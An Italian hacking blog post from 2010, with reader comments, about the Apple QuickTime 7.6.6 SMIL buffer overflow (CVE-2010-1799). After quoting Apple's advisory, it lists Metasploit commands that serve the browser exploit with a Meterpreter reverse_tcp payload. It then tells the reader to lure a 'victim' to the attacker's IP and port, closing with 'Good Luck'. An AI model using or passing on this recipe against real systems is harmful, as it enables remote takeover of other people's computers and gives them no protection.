ClsHack:Computer Security Blog    

[METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow


Nuova falla per Apple QuickTime 7.6.6 fixata il 12 agosto 2010, con il rilascio della versione 7.6.7.

Dal sito ufficiale:

CVE-ID: CVE-2010-1799

Available for: Windows 7, Vista, XP SP2 or later


Impact: Viewing a maliciously crafted movie file may lead to un unexpected application termination or arbitrary code execution.

Description: A stack buffer overflow exists in QuickTime’s error logging. Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution. This issue is addressed by disabling debug logging. This issue does not affect Mac OS X systems.

Vediamo come utilizzare questo exploit con metasploit o.O

Aggiorniamo metasploit:
sudo svn update

Prendiamo l’exploit:
use windows/browser/apple_quicktime_smil_debug
Nostro ip, dove andrà in ascolto il server sulla 8080 (porta cambiabile show options)
set SRVHOST IP
set URIPATH /
Usiamo meterpreter:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Adesso facciamo visitare alla vittima:
IP:8080

Good Luck :D

Related posts:

  1. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  2. [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
  3. IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
  4. Hack di WINDOWS con metasploit e IE 0day aka (Aurora) exploit
  5. KiTrap0D Virtual-DOS oday per metasploit :)

This entry was posted on Saturday, August 14th, 2010 at 11:56 am and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with:
  • http://sixthevicious.wordpress.com/ Six110

    Sono abbonato ai feed di mt eppure mi è scappato! Dove lo hai letto sul sito ufficiale?

  • Pingback: [METASPLOIT]Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow | ItaliaON

  • clshack

    Io faccio giornalmente in msf:

    svn update

    E ho visto che avevano aggiunto questo modulo o.O

  • http://sixthevicious.wordpress.com/ Six110

    io uso msfupdate!!!

  • Tabris

    Gran bel lavoro in generale complimenti. Mi hai fatto tornare la voglia di una distro :) Ti devo un favore.

  • clshack

    @Tabris

    Grazie a te ;)
    Non ho capito cosa tu intenda per ‘Mi hai fatto tornare la voglia di una distro :)’ comunque ciao ;) Buona fortuna :D

  • Pingback: Apple QuickTime | Clshack